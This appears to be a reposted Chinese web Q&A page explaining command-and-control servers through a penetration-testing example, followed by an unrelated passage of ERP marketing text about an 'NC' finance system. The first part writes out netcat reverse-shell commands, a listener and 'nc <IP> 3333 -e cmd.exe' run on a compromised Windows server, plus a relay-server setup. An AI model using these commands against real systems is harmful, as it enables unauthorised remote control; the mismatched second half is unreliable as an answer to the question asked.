什么是C&C服务器

什么是C&C服务器,第1张

C&C 服务器的全称是 Command and Control Server,翻译过来就是命令和控制服务器

通常在做渗透测试的时候,在拿到一个 webshell 的时候,需要对服务器进行提权操作,如果是一台 windows 的服务器,提权的时候通常是利用本地提权漏洞的 exp 进行溢出提权,有些 exp 可以直接在后面加参数,溢出成功之后执行参数中的命令。

而有的 exp 溢出成功之后是返回一个 system 权限的 cmd,这时就需要将低权限的 cmd shell 反弹回本地,这里用 nc 在本地执行:nc -vv -lp 3333

上述命令的意思是在本地监听一个 3333 端口等待连接,假设电脑 IP 是公网的,并且 IP 为 114.114.114.114,然后在目标服务器就可以执行:nc 114.114.114.114 3333 -e cmd.exe

上面的命令就可以把远程服务器的服务器权限的 cmd shell 返回到本地,这时你就可以通过 nc 建立的这个 shell 进行通信,发送你要执行的命令,在远程服务器接收到命令之后执行并将结果返回,这时本机电脑就是一个简易的 C&C 服务器。

扩展资料

C&C 服务器使目标机器可以接收来自服务器的命令,从而达到服务器控制目标机器的目的。该方法常用于病毒木马控制被感染的机器。

通常只有这样内网的服务器才可以访问进行连接,所以可以使用一台中转服务器,这台中转服务器有一个公网 IP 地址是:111.111.111.111,这样不管是目标服务器还是我们本机都可以访问这台中转服务器。

这里中转服务器的作用就是本地内网的主机监听的端口映射到公网 IP 的某个端口,这样目标机访问中转服务器监听的端口就相当于访问了我们本地监听的端口。

甚么是NC服务器

回答:

NC财务系统

NC财务系统为企业提供了1个全面的预算管理平台,支持企业从销售计划→生产计划→采购计划→费用计划→投资计划→资金计划→损益计划→资产负债计划的全面预算控制。实现了对经营行动的事前编制、事中控制和事后分析。

NC财务系统充分斟酌了用户的个性化需求,提供了多种自我配置和客户化工具,满足用户的特殊要求,从而使产品更具有弹性。在个性化利用上,NC财务系统主要提供了以下功能:

业务流程可配置:用户可根据企业的实际业务流程进行相应的流程定义,使系统的处理流程合适本企业利用;

利用组件可配置:用户可选择本单位所需的具体利用功能进行功能组合;

用户菜单可配置:对不同的用户来讲,可根据企业的性质、习惯、管理要求等自行进行功能菜单的配置;单据格式、报表格式自定义;提供2次开发产品和与外围产品的挂接功能:NC提供了1个以消息、邮件等技术为基础的工作流平台,来解决各个模块的用户权限、菜单定义,业务流程配置,并和办公自动化、ERP系统无缝地集成在1起。

NC采取移动计算技术,对各种移动装备提供广泛的支持,包括从原来的台式机,笔记本到掌上电脑(PDA)、手机以致寻呼机。NC所采取的产品全面基于J2EE的技术架构,设计了流行的B/S利用构架,适应于企业的集中化利用,可以实现:

1.集中化管理和保护,客户真个免安装和零保护,极大的下降了企业的保护本钱。

2.用户层、Web服务器、利用服务器、数据库服务器的公道散布,实现利用服务器的群集,

3.全部系统具有很高的可扩大性、安全性和可靠性。可实现客户层的任意可以替换性,完全满足移动办公的需要。


欢迎分享,转载请注明来源:夏雨云

原文地址:https://www.xiayuyun.com/zonghe/82542.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2023-03-04
下一篇2023-03-04

发表评论

登录后才能评论

评论列表(0条)

    保存